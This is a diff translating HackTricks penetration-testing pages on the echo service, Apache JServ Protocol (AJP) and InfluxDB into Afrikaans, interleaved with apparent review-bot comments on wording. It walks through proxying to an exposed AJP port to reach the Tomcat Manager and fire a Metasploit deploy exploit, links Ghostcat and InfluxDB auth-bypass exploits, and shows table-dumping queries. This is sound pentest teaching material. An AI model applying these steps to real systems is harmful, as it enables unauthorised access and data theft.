**HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Basic Information +# Basiese Inligting -An echo service is running on this host. The echo service was intended for testing and measurement purposes and may listen on both TCP and UDP protocols. The server sends back any data it receives, with no modification.\ -**It's possible to cause a denial of service by connecting the a echo service to the echo service on the same or another machine**. Because of the excessively high number of packets produced, the affected machines may be effectively taken out of service.\ -Info from [https://www.acunetix.com/vulnerabilities/web/echo-service-running/](https://www.acunetix.com/vulnerabilities/web/echo-service-running/) - -**Default Port:** 7/tcp/udp +'n Echo-diens word op hierdie gasheer uitgevoer. Die echo-diens was bedoel vir toets- en meetdoeleindes en kan op beide TCP- en UDP-protokolle luister. Die bediener stuur enige data wat dit ontvang terug, sonder enige wysiging.\ +**Dit is moontlik om 'n denial of service te veroorsaak deur die aanskakeling van 'n echo-diens aan die echo-diens op dieselfde of 'n ander masjien**. As gevolg van die oormatig hoë aantal pakkies wat geproduseer word, kan die geaffekteerde masjiene effektief buite werking gestel word.\ +Inligting vanaf [https://www.acunetix.com/vulnerabilities/web/echo-service-running/](https://www.acunetix.com/vulnerabilities/web/echo-service-running/) +**Verstekpoort:** 7/tcp/udp ``` PORT STATE SERVICE 7/udp open echo 7/tcp open echo ``` +## Kontak Echo-diens (UDP) -## Contact Echo service (UDP) +To contact an Echo service using UDP, you can use the `nc` command with the `-u` flag followed by the IP address and port number of the target. For example: +```bash +nc -u +``` + +The Echo service will simply send back any data it receives, allowing you to test the connectivity and response of the target system. 
```bash nc -uvn 7 Hello echo #This is wat you send Hello echo #This is the response ``` - ## Shodan * `port:7 echo` -## References +## Verwysings [Wikipedia echo](http://en.wikipedia.org/wiki/ECHO\_protocol) @@ -50,16 +52,14 @@ Hello echo #This is the response
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md index a30512e37..b068d46a8 100644 --- a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md +++ b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md @@ -1,82 +1,77 @@ -# 8009 - Pentesting Apache JServ Protocol (AJP) +# 8009 - Pentesting Apache JServ-Protokol (AJP)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutjagters vir belonings! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Hack-nuus in werklikheid**\ +Bly op hoogte van die vinnige wêreld van hacking deur middel van werklike nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutjagbelydenisse en belangrike platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! -## Basic Information +## Basiese Inligting -From: [https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/](https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/) +Vanaf: [https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/](https://diablohorn.com/2011/10/19/8009-the-forgotten-tomcat-port/) -> AJP is a wire protocol. It an optimized version of the HTTP protocol to allow a standalone web server such as [Apache](http://httpd.apache.org/) to talk to Tomcat. Historically, Apache has been much faster than Tomcat at serving static content. The idea is to let Apache serve the static content when possible, but proxy the request to Tomcat for Tomcat related content. +> AJP is 'n draadprotokol. 
Dit is 'n geoptimeerde weergawe van die HTTP-protokol wat 'n afsonderlike webbediener soos [Apache](http://httpd.apache.org/) in staat stel om met Tomcat te kommunikeer. Histories gesien was Apache baie vinniger as Tomcat om statiese inhoud te bedien. Die idee is om Apache toe te laat om die statiese inhoud te bedien waar moontlik, maar om die versoek na Tomcat te stuur vir Tomcat-verwante inhoud. -Also interesting: +Ook interessant: -> The ajp13 protocol is packet-oriented. A binary format was presumably chosen over the more readable plain text for reasons of performance. The web server communicates with the servlet container over TCP connections. To cut down on the expensive process of socket creation, the web server will attempt to maintain persistent TCP connections to the servlet container, and to reuse a connection for multiple request/response cycles - -**Default port:** 8009 +> Die ajp13-protokol is pakketgeoriënteerd. 'n Binêre formaat is waarskynlik gekies bo die meer leesbare platte teks vir prestasie-redes. Die webbediener kommunikeer met die servlet-houer oor TCP-verbindings. Om die duur proses van soket-skepping te verminder, sal die webbediener probeer om volgehoue TCP-verbindings na die servlet-houer te handhaaf en 'n verbinding vir meerdere versoek-/antwoord-siklusse te hergebruik. +**Verstekpoort:** 8009 ``` PORT STATE SERVICE 8009/tcp open ajp13 ``` - ## CVE-2020-1938 ['Ghostcat'](https://www.chaitin.cn/en/ghostcat) -If the AJP port is exposed, Tomcat might be susceptible to the Ghostcat vulnerability. Here is an [exploit](https://www.exploit-db.com/exploits/48143) that works with this issue. +As die AJP-poort blootgestel word, kan Tomcat vatbaar wees vir die Ghostcat-kwesbaarheid. Hier is 'n [exploit](https://www.exploit-db.com/exploits/48143) wat werk met hierdie probleem. -Ghostcat is a LFI vulnerability, but somewhat restricted: only files from a certain path can be pulled. 
Still, this can include files like `WEB-INF/web.xml` which can leak important information like credentials for the Tomcat interface, depending on the server setup. +Ghostcat is 'n LFI-kwesbaarheid, maar enigsins beperk: slegs lêers vanaf 'n sekere pad kan getrek word. Dit kan steeds lêers soos `WEB-INF/web.xml` insluit wat belangrike inligting soos geloofsbriewe vir die Tomcat-koppelvlak kan uitlek, afhangende van die bedieneropset. -Patched versions at or above 9.0.31, 8.5.51, and 7.0.100 have fixed this issue. +Gepatchte weergawes by of bo 9.0.31, 8.5.51 en 7.0.100 het hierdie probleem reggestel. -## Enumeration - -### Automatic +## Enumerasie +### Outomaties ```bash nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 ``` - ### [**Brute force**](../generic-methodologies-and-resources/brute-force.md#ajp) ## AJP Proxy -### Nginx Reverse Proxy & AJP +### Nginx Omgekeerde Proxy & AJP -[Checkout the Dockerized version](#Dockerized-version) +[Kyk na die Dockerized weergawe](#Dockerized-weergawe) -When we come across an open AJP proxy port (8009 TCP), we can use Nginx with the `ajp_module` to access the "hidden" Tomcat Manager. This can be done by compiling the Nginx source code and adding the required module, as follows: - -* Download the Nginx source code -* Download the required module -* Compile Nginx source code with the `ajp_module`. -* Create a configuration file pointing to the AJP Port +Wanneer ons op 'n oop AJP proxy-poort (8009 TCP) afkomstig is, kan ons Nginx met die `ajp_module` gebruik om toegang tot die "verborge" Tomcat-bestuurder te verkry. Dit kan gedoen word deur die Nginx-bronkode af te laai en die vereiste module by te voeg, soos volg: +* Laai die Nginx-bronkode af +* Laai die vereiste module af +* Kompileer die Nginx-bronkode met die `ajp_module`. +* Skep 'n konfigurasie-lêer wat na die AJP-poort verwys ```bash # Download Nginx code wget https://nginx.org/download/nginx-1.21.3.tar.gz 
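Review bot: the in-page anchor `[Kyk na die Dockerized weergawe](#Dockerized-weergawe)` does not point at the heading it is meant for: the heading in the next hunk is `### Nginx Dockerized-weergawe`, whose generated slug is `#nginx-dockerized-weergawe` (the pre-translation `#Dockerized-version` had the same mismatch against `### Nginx Dockerized-version`), so fix the fragment while touching this line. A few renderings also change meaning: `**Hack-nuus in werklikheid**` turns "Real-Time Hack News" into "hack news in reality" (prefer `Intydse hack-nuus`), `foutjagbelydenisse` turns "bug bounties" into "confessions" (use `foutjagbelonings`, as the later footer does), `afkomstig is` means "originates from" where "come across" is `afkom`, and "somewhat restricted" is `ietwat beperk` rather than `enigsins beperk`.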
@@ -91,128 +86,117 @@ make sudo make install nginx -V ``` - -Comment out the entire `server` block and append the following lines inside the `http` block in `/etc/nginx/conf/nginx.conf`. - +Kommentaar uit die hele `server` blok en voeg die volgende lyne by binne die `http` blok in `/etc/nginx/conf/nginx.conf`. ```shell-session upstream tomcats { - server :8009; - keepalive 10; - } +server :8009; +keepalive 10; +} server { - listen 80; - location / { - ajp_keep_conn on; - ajp_pass tomcats; - } +listen 80; +location / { +ajp_keep_conn on; +ajp_pass tomcats; +} } ``` - -Start Nginx and check if everything is working correctly by issuing a cURL request to your local host. - +Begin deur Nginx te begin en te kontroleer of alles korrek werk deur 'n cURL-versoek na jou plaaslike bediener te stuur. ```html sudo nginx curl http://127.0.0.1:80 - - - Apache Tomcat/X.X.XX - - - - -
- -
-

Apache Tomcat/X.X.XX

-
-
-
-

If you're seeing this, you've successfully installed Tomcat. Congratulations!

+ + +Apache Tomcat/X.X.XX + + + + +
+ +
+

Apache Tomcat/X.X.XX

+
+
+
+

If you're seeing this, you've successfully installed Tomcat. Congratulations!

``` - -### Nginx Dockerized-version - +### Nginx Dockerized-weergawe ```bash git clone https://github.com/ScribblerCoder/nginx-ajp-docker cd nginx-ajp-docker ``` -Replace `TARGET-IP` in `nginx.conf` witg AJP IP then build and run +Vervang `TARGET-IP` in `nginx.conf` met AJP IP, bou en voer uit. ``` bash docker build . -t nginx-ajp-proxy docker run -it --rm -p 80:80 nginx-ajp-proxy ``` - ### Apache AJP Proxy -Encountering an open port 8009 without any other accessible web ports is rare. However, it is still possible to exploit it using **Metasploit**. By leveraging **Apache** as a proxy, requests can be redirected to **Tomcat** on port 8009. - +Om 'n oop poort 8009 te vind sonder enige ander toeganklike web poorte is skaars. Dit is egter steeds moontlik om dit uit te buit deur gebruik te maak van **Metasploit**. Deur **Apache** as 'n proksi te gebruik, kan versoek na **Tomcat** op poort 8009 omgelei word. ```bash sudo apt-get install libapache2-mod-jk sudo vim /etc/apache2/apache2.conf # append the following line to the config - Include ajp.conf -sudo vim /etc/apache2/ajp.conf # create the following file, change HOST to the target address - ProxyRequests Off - - Order deny,allow - Deny from all - Allow from localhost - - ProxyPass / ajp://HOST:8009/ - ProxyPassReverse / ajp://HOST:8009/ +Include ajp.conf +sudo vim /etc/apache2/ajp.conf # create the following file, change HOST to the target address +ProxyRequests Off + +Order deny,allow +Deny from all +Allow from localhost + +ProxyPass / ajp://HOST:8009/ +ProxyPassReverse / ajp://HOST:8009/ sudo a2enmod proxy_http sudo a2enmod proxy_ajp sudo systemctl restart apache2 ``` - -This setup offers the potential to bypass intrusion detection and prevention systems (IDS/IPS) due to the **AJP protocol's binary nature**, although this capability has not been verified. By directing a regular Metasploit Tomcat exploit to `127.0.0.1:80`, you can effectively seize control of the targeted system. 
- +Hierdie opset bied die potensiaal om indringingsdeteksie- en voorkomingsstelsels (IDS/IPS) te omseil as gevolg van die **binêre aard van die AJP-protokol**, alhoewel hierdie vermoë nog nie geverifieer is nie. Deur 'n gewone Metasploit Tomcat-aanval na `127.0.0.1:80` te rig, kan jy effektief beheer oor die geteikende stelsel verkry. ```bash msf exploit(tomcat_mgr_deploy) > show options ``` - -## References +## Verwysings * [https://github.com/yaoweibin/nginx_ajp_module](https://github.com/yaoweibin/nginx_ajp_module) * [https://academy.hackthebox.com/module/145/section/1295](https://academy.hackthebox.com/module/145/section/1295)
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om met ervare hackers en foutjagters te kommunikeer! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Real-Time Hack Nuus**\ +Bly op hoogte van die vinnige wêreld van hacking deur middel van real-time nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste Aankondigings**\ +Bly ingelig met die nuutste foutjagbountes wat bekendgestel word en belangrike platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
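Review bot: the indentation inside two code fences was stripped along with the translation, e.g. `-    server :8009;` / `+server :8009;` in the nginx `upstream`/`server` block and the `ProxyPass` lines in `ajp.conf`; a translation PR should leave fenced code byte-for-byte unchanged, both to keep the diff reviewable and because the nesting of the nginx blocks is only visible through that indentation. Two wording points: `Begin deur Nginx te begin en te kontroleer` doubles "begin" (the source says "Start Nginx and check", so `Begin Nginx en kontroleer` suffices), and `kan versoek na **Tomcat** ... omgelei word` needs the plural `versoeke`. The removal of blank lines between prose and the opening fences is applied consistently and is fine.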
diff --git a/network-services-pentesting/8086-pentesting-influxdb.md b/network-services-pentesting/8086-pentesting-influxdb.md index 25e5b3c44..4064f40ce 100644 --- a/network-services-pentesting/8086-pentesting-influxdb.md +++ b/network-services-pentesting/8086-pentesting-influxdb.md @@ -3,66 +3,59 @@
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Basic Information +## Basiese Inligting -**InfluxDB** is an open-source **time series database (TSDB)** developed by InfluxData. TSDBs are optimized for storing and serving time series data, which consists of timestamp-value pairs. Compared to general-purpose databases, TSDBs provide significant improvements in **storage space** and **performance** for time series datasets. They employ specialized compression algorithms and can be configured to automatically remove old data. Specialized database indices also enhance query performance. - -**Default port**: 8086 +**InfluxDB** is 'n oopbron **tydreeksdatabasis (TSDB)** wat ontwikkel is deur InfluxData. TSDB's is geoptimeer vir die stoor en bediening van tydreeksdata, wat bestaan uit tydstempel-waardepare. In vergelyking met algemene databasisse bied TSDB's aansienlike verbeterings in **stoorruimte** en **prestasie** vir tydreeksdatastelle. Hulle maak gebruik van gespesialiseerde kompressie-algoritmes en kan gekonfigureer word om outomaties ou data te verwyder. Gespesialiseerde databasisindekse verbeter ook die vraagprestasie. +**Verstekpoort**: 8086 ``` PORT STATE SERVICE VERSION 8086/tcp open http InfluxDB http admin 1.7.5 ``` +## Enumerasie -## Enumeration +Vanuit 'n pentester se oogpunt is hierdie 'n ander databasis wat sensitiewe inligting kan stoor, so dit is interessant om te weet hoe om al die inligting te dump. -From a pentester point of view this another database that could be storing sensitive information, so it's interesting to know how to dump all the info. - -### Authentication - -InfluxDB might require authentication or not +### Verifikasie +InfluxDB mag verifikasie vereis of nie. ```bash # Try unauthenticated influx -host 'host name' -port 'port #' > use _internal ``` - -If you **get an error like** this one: `ERR: unable to parse authentication credentials` it means that it's **expecting some credentials**. 
- +As jy 'n fout soos hierdie een kry: `ERR: nie in staat om verifikasiebewyse te ontled nie`, beteken dit dat dit **verifikasiebewyse verwag**. ``` influx –username influx –password influx_pass ``` +Daar was 'n kwesbaarheid in influxdb wat toegelaat het om die outentifikasie te omseil: [**CVE-2019-20933**](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933) -There was a vulnerability influxdb that allowed to bypass the authentication: [**CVE-2019-20933**](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933) +### Handleiding Enumerasie -### Manual Enumeration +Die inligting van hierdie voorbeeld is geneem van [**hier**](https://oznetnerd.com/2017/06/11/getting-know-influxdb/). -The information of this example was taken from [**here**](https://oznetnerd.com/2017/06/11/getting-know-influxdb/). - -#### Show databases - -The found databases are `telegraf` and `internal` (you will find this one everywhere) +#### Wys databasisse +Die gevonde databasisse is `telegraf` en `internal` (jy sal hierdie een oral vind) ```bash > show databases name: databases @@ -71,11 +64,9 @@ name telegraf _internal ``` +#### Wys tabelle/metings -#### Show tables/measurements - -The [**InfluxDB documentation**](https://docs.influxdata.com/influxdb/v1.2/introduction/getting_started/) explains that **measurements** in InfluxDB can be paralleled with SQL tables. The nomenclature of these **measurements** is indicative of their respective content, each housing data relevant to a particular entity. - +Die [**InfluxDB-dokumentasie**](https://docs.influxdata.com/influxdb/v1.2/introduction/getting_started/) verduidelik dat **metings** in InfluxDB gelykstaande is aan SQL-tabelle. Die benaming van hierdie **metings** dui op hul onderskeie inhoud, waar elkeen data bevat wat relevant is vir 'n spesifieke entiteit. ```bash > show measurements name: measurements 
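Review bot: the quoted error string was translated: `ERR: unable to parse authentication credentials` became `ERR: nie in staat om verifikasiebewyse te ontled nie`. That text is literal `influx` client output the reader has to match against their own terminal, so it must stay in English inside the backticks; only the surrounding sentence should be translated. Also `### Handleiding Enumerasie` reads as "handbook enumeration"; "Manual Enumeration" is `Handmatige Enumerasie`. While here, the unchanged context line `influx –username influx –password influx_pass` carries en-dashes where the CLI expects `--`, so it will not work if copied as-is.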
@@ -90,11 +81,9 @@ processes swap system ``` +#### Wys kolomme/veld sleutels -#### Show columns/field keys - -The field keys are like the **columns** of the database - +Die veld sleutels is soos die **kolomme** van die databasis ```bash > show field keys name: cpu @@ -115,11 +104,9 @@ inodes_used integer [ ... more keys ...] ``` +#### Stort Tabel -#### Dump Table - -And finally you can **dump the table** doing something like - +En uiteindelik kan jy die tabel **stort** deur iets soos dit te doen ```bash select * from cpu name: cpu @@ -128,35 +115,32 @@ time cpu host usage_guest usage_guest_nice usage_idle 1497018760000000000 cpu-total ubuntu 0 0 99.297893681046 0 0 0 0 0 0.35105315947842414 0.35105315947842414 1497018760000000000 cpu1 ubuntu 0 0 99.69909729188728 0 0 0 0 0 0.20060180541622202 0.10030090270811101 ``` - {% hint style="warning" %} -In some testing with the authentication bypass it was noted that the name of the table needed to be between double quotes like: `select * from "cpu"` +In sommige toetse met die omseiling van die verifikasie is opgemerk dat die naam van die tabel tussen dubbele aanhalingstekens moet wees, soos: `select * from "cpu"` {% endhint %} -### Automated Authentication - +### Outomatiese Verifikasie ```bash msf6 > use auxiliary/scanner/http/influxdb_enum ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslag.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome** te bou en outomatiseer met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} diff --git a/network-services-pentesting/8089-splunkd.md b/network-services-pentesting/8089-splunkd.md index 5289c81d4..d6c4101dc 100644 --- a/network-services-pentesting/8089-splunkd.md +++ b/network-services-pentesting/8089-splunkd.md @@ -2,67 +2,64 @@
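Review bot: the two Trickest banners in this file are now translated differently: the top one (first hunk) reads `om maklik en outomatiese werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente` with the bold dropped, while this one keeps the source emphasis as `om maklik **werkstrome** te bou en outomatiseer ... **mees gevorderde**`. Prefer the second wording, which preserves the `**automate workflows**` / `**most advanced**` markup, and use it in both places. Optionally, `### Outomatiese Verifikasie` literally says "automatic authentication" for a section whose only content is the `influxdb_enum` scanner; `Outomatiese Enumerasie` would describe what the block does.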
